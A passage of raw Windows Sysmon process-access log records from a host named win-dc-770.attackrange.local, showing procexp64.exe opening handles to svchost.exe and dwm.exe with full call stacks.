Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792277Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792276Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792275Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792274Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792273Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792272Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792271Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792270Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792269Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792268Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792267Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792266Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792265Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792264Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792263Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792262Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792261Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792260Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\U